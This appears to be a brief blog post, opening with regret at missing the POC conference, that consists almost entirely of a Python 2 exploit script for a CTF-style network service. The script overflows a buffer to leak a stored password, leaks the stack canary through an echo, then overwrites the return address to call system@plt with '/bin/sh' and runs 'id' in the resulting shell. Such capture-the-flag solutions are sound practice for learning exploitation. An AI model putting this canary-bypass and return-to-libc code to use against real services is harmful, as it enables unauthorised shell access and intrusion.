The sadness of not being able to go to POC...
```python
# Python 2 script (print statements, str-based sockets) for the CTF-style target below.
from socket import *
from time import sleep
from struct import pack, unpack

p = lambda x: pack("<L", x)          # 32-bit little-endian pack
up = lambda x: unpack("<L", x)[0]    # 32-bit little-endian unpack

connectto = ('192.168.223.129', 1127)

def getpassword():
    # First connection: overflow the login buffer to leak the stored password.
    S = socket(AF_INET, SOCK_STREAM)
    S.connect(connectto)
    S.send("A" * 0x11d + p(0x804b060) + "\n")  # Password leak
    print S.recv(1024)
    ipw = S.recv(1024)
    print ipw
    print "[!] Password : " + ipw[ipw.find("***:") + 5:ipw.find("terminated")]
    return ipw[ipw.find("***:") + 5:ipw.find("terminated")]

def main():
    Password = getpassword()
    S = socket(AF_INET, SOCK_STREAM)
    S.connect(connectto)
    system_plt = 0x8048610
    canary = 0x00000000
    name_data = 0x804b0e0
    print S.recv(1024)
    # Log in with the leaked password so the service does not exit(1)
    S.send(Password + "\n")
    sleep(0.5)
    print S.recv(1024)
    S.send("2\n")
    print S.recv(1024)
    S.send("1\n")
    print S.recv(1024)
    # Set name data to "/bin/sh" and get the canary
    S.send("4\n")
    print S.recv(1024)
    S.send("A" * 0x16)  # get canary (no newline: the following echo leaks adjacent bytes)
    print S.recv(1024)
    S.send("/bin/sh;")
    print S.recv(1024)
    S.send("A\n")
    sleep(1)
    icanary = S.recv(1024)
    print "1"
    print icanary
    # The lowest canary byte is always 0x00, so only the upper three bytes are leaked;
    # prepend the null byte before unpacking.
    canary = up(chr(0x0) + icanary[69:72])
    print "[!] Canary : " + hex(canary)
    # Attack RTL with canary: pad, correct canary, saved regs, system@plt, fake ret, arg
    S.send("3\n")
    print S.recv(1024)
    S.send("A" * 0xd9 + p(canary) + "A" * 0xC + p(system_plt) + "AAAA" + p(name_data) + "\n")
    sleep(0.5)
    print S.recv(1024)
    # exit
    S.send("0\n")
    sleep(0.5)
    print S.recv(1024)
    S.send("1\n")
    sleep(1.5)
    print S.recv(1024)
    # get id at /bin/sh
    S.send("id;\n")
    print S.recv(1024)

if __name__ == "__main__":
    main()
```